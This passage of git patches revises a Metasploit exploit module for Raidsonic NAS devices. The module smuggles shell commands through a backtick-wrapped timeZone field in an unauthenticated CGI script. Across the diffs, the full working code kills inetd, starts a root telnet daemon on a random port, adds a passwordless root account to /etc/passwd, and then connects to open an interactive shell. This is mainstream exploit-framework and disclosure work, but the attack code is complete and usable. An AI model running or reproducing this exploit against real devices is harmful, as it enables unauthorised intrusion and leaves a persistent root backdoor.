Timeout.timeout(banner_timeout) do while(true) data = sock.get_once(-1, tel_timeout) return nil if not data or data.length == 0 -<<<<<<< HEAD - if data =~ /login/ -======= if data =~ /#{pattern}/ ->>>>>>> 7a8bafd82c22d31d2749c82502eaac8a89ea0db2 return true end end From c902b0ea4b2040d7a924d33feaf3f217723f6e6a Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Mon, 19 Aug 2013 18:07:11 +0200 Subject: [PATCH 10/14] removed user and pass option --- .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 561901e60a..bff2e93ba2 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -56,13 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0 )) - register_options( - [ - OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ false, 'Password to login with', 'admin']), - - ], self.class) - register_advanced_options( [ OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), From 62cf9cb07cb9c4779f3c8dec6a0e801e82e20390 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Sep 2013 09:09:16 -0500 Subject: [PATCH 11/14] Retab changes for PR #2188 --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 338 +++++++++--------- 1 file changed, 169 insertions(+), 169 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index bff2e93ba2..9b8a56343b 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -8,197 +8,197 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ExcellentRanking - include Msf::Exploit::Remote::HttpClient - include Msf::Auxiliary::CommandShell - include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::CommandShell + include Msf::Exploit::FileDropper - RESPONSE_PATTERN = "\ 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', - 'Description' => %q{ - Different Raidsonic NAS devices are vulnerable to OS command injection via the web - interface. The vulnerability exists in timeHandler.cgi, which is accessible without - authentication. This module has been tested with the versions IB-NAS5220 and - IB-NAS4220. - }, - 'Author' => - [ - 'Michael Messner ', # Vulnerability discovery and Metasploit module - 'juan vazquez' # minor help with msf module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'OSVDB', '90221' ], - [ 'EDB', '24499' ], - [ 'BID', '57958' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] - ], - 'DisclosureDate' => 'Feb 04 2013', - 'Privileged' => true, - 'Platform' => ['linux','unix'], - 'Payload' => - { - 'Compat' => { - 'PayloadType' => 'cmd_interact', - 'ConnectionType' => 'find', - }, - }, - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, - 'Targets' => - [ - [ 'Automatic', { } ], - ], - 'DefaultTarget' => 0 - )) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution', + 'Description' => %q{ + Different Raidsonic NAS devices are vulnerable to OS command injection via the web + interface. The vulnerability exists in timeHandler.cgi, which is accessible without + authentication. This module has been tested with the versions IB-NAS5220 and + IB-NAS4220. + }, + 'Author' => + [ + 'Michael Messner ', # Vulnerability discovery and Metasploit module + 'juan vazquez' # minor help with msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'OSVDB', '90221' ], + [ 'EDB', '24499' ], + [ 'BID', '57958' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ] + ], + 'DisclosureDate' => 'Feb 04 2013', + 'Privileged' => true, + 'Platform' => ['linux','unix'], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0 + )) - register_advanced_options( - [ - OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), - OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) - ], self.class) - end + register_advanced_options( + [ + OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]), + OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]) + ], self.class) + end - def tel_timeout - (datastore['TelnetTimeout'] || 10).to_i - end + def tel_timeout + (datastore['TelnetTimeout'] || 10).to_i + end - def banner_timeout - (datastore['TelnetBannerTimeout'] || 25).to_i - end + def banner_timeout + (datastore['TelnetBannerTimeout'] || 25).to_i + end - def exploit - telnet_port = rand(65535) + def exploit + telnet_port = rand(65535) - print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") + print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") - #first request - cmd = "killall inetd" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending first request - killing inetd") + #first request + cmd = "killall inetd" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending first request - killing inetd") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #second request - inetd_cfg = rand_text_alpha(8) - cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending second request - configure inetd") - register_file_for_cleanup("/tmp/#{inetd_cfg}") + #second request + inetd_cfg = rand_text_alpha(8) + cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending second request - configure inetd") + register_file_for_cleanup("/tmp/#{inetd_cfg}") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #third request - cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") + #third request + cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end - #fourth request - @user = rand_text_alpha(6) - cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" - cmd = Rex::Text.uri_encode(cmd) - print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") + #fourth request + @user = rand_text_alpha(6) + cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd" + cmd = Rex::Text.uri_encode(cmd) + print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}") - res = request(cmd) - #no server header or something that we could use to get sure the command is executed - if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") - end - begin - print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) + res = request(cmd) + #no server header or something that we could use to get sure the command is executed + if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") + end + begin + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) - if sock.nil? - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") - end + if sock.nil? + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end - print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") - prompt = negotiate_telnet(sock) - if prompt.nil? - sock.close - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") - else - print_good("#{rhost}:#{rport} - Telnet session successfully established...") - end + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end - handler(sock) - rescue - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") - end - return - end + handler(sock) + rescue + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") + end + return + end - def request(cmd) + def request(cmd) - uri = '/cgi/time/timeHandler.cgi' + uri = '/cgi/time/timeHandler.cgi' - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'POST', - #not working without setting encode_params to false! - 'encode_params' => false, - 'vars_post' => { - "month" => "#{rand(12)}", - "date" => "#{rand(30)}", - "year" => "20#{rand(99)}", - "hour" => "#{rand(12)}", - "minute" => "#{rand(60)}", - "ampm" => "PM", - "timeZone" => "Amsterdam`#{cmd}`", - "ntp_type" => "default", - "ntpServer" => "none", - "old_date" => " 1 12007", - "old_time" => "1210", - "old_timeZone" => "Amsterdam", - "renew" => "0" - } - }) - return res - rescue ::Rex::ConnectionError - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") - end - end + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + #not working without setting encode_params to false! + 'encode_params' => false, + 'vars_post' => { + "month" => "#{rand(12)}", + "date" => "#{rand(30)}", + "year" => "20#{rand(99)}", + "hour" => "#{rand(12)}", + "minute" => "#{rand(60)}", + "ampm" => "PM", + "timeZone" => "Amsterdam`#{cmd}`", + "ntp_type" => "default", + "ntpServer" => "none", + "old_date" => " 1 12007", + "old_time" => "1210", + "old_timeZone" => "Amsterdam", + "renew" => "0" + } + }) + return res + rescue ::Rex::ConnectionError + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") + end + end - def negotiate_telnet(sock) - login = read_telnet(sock, "login: $") - if login - sock.put("#{@user}\r\n") - end - return read_telnet(sock, "> $") - end + def negotiate_telnet(sock) + login = read_telnet(sock, "login: $") + if login + sock.put("#{@user}\r\n") + end + return read_telnet(sock, "> $") + end - def read_telnet(sock, pattern) - begin - Timeout.timeout(banner_timeout) do - while(true) - data = sock.get_once(-1, tel_timeout) - return nil if not data or data.length == 0 - if data =~ /#{pattern}/ - return true - end - end - end - rescue ::Timeout::Error - return nil - end - end + def read_telnet(sock, pattern) + begin + Timeout.timeout(banner_timeout) do + while(true) + data = sock.get_once(-1, tel_timeout) + return nil if not data or data.length == 0 + if data =~ /#{pattern}/ + return true + end + end + end + rescue ::Timeout::Error + return nil + end + end end From 86e5163cada8218ff4fee3637127497fc7b129ce Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 16 Sep 2013 09:19:26 -0500 Subject: [PATCH 12/14] Fix Indentation and cleanup --- .../http/raidsonic_nas_ib5220_exec_noauth.rb | 41 +++++++++---------- 1 file changed, 19 insertions(+), 22 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 9b8a56343b..19f35eedde 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = ManualRanking # It's backdooring the remote device include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::CommandShell @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Feb 04 2013', 'Privileged' => true, - 'Platform' => ['linux','unix'], + 'Platform' => 'unix', 'Payload' => { 'Compat' => { @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DefaultTarget' => 0 )) @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}" cmd = Rex::Text.uri_encode(cmd) print_status("#{rhost}:#{rport} - sending second request - configure inetd") - register_file_for_cleanup("/tmp/#{inetd_cfg}") res = request(cmd) #no server header or something that we could use to get sure the command is executed if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end + register_file_for_cleanup("/tmp/#{inetd_cfg}") #third request cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}" @@ -122,28 +122,25 @@ class Metasploit3 < Msf::Exploit::Remote if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end - begin - print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) - if sock.nil? - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") - end + print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) - print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") - prompt = negotiate_telnet(sock) - if prompt.nil? - sock.close - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") - else - print_good("#{rhost}:#{rport} - Telnet session successfully established...") - end - - handler(sock) - rescue + if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end - return + + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") + prompt = negotiate_telnet(sock) + if prompt.nil? + sock.close + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session") + else + print_good("#{rhost}:#{rport} - Telnet session successfully established...") + end + + handler(sock) + end def request(cmd) From 926ddf35bc2b1505fa430edd98a454827ce4318f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 19 Sep 2013 08:23:25 -0500 Subject: [PATCH 13/14] Fix possible collisions on binding port and handle rex socket --- .../linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index 19f35eedde..ea03679036 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - telnet_port = rand(65535) + telnet_port = rand(32767) + 32768 print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}") @@ -124,12 +124,15 @@ class Metasploit3 < Msf::Exploit::Remote end print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...") - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i }) + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx }) if sock.nil? fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!") end + add_socket(sock) + print_status("#{rhost}:#{rport} - Trying to establish a telnet session...") prompt = negotiate_telnet(sock) if prompt.nil? From 71d74655f9375e6a0822d4778473cc73afe7fa7f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 23 Sep 2013 11:44:04 -0500 Subject: [PATCH 14/14] Modify description --- .../exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb index ea03679036..24333eec45 100644 --- a/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb +++ b/modules/exploits/linux/http/raidsonic_nas_ib5220_exec_noauth.rb @@ -23,7 +23,8 @@ class Metasploit3 < Msf::Exploit::Remote Different Raidsonic NAS devices are vulnerable to OS command injection via the web interface. The vulnerability exists in timeHandler.cgi, which is accessible without authentication. This module has been tested with the versions IB-NAS5220 and - IB-NAS4220. + IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon + configuration, users should use this module at his own risk. }, 'Author' => [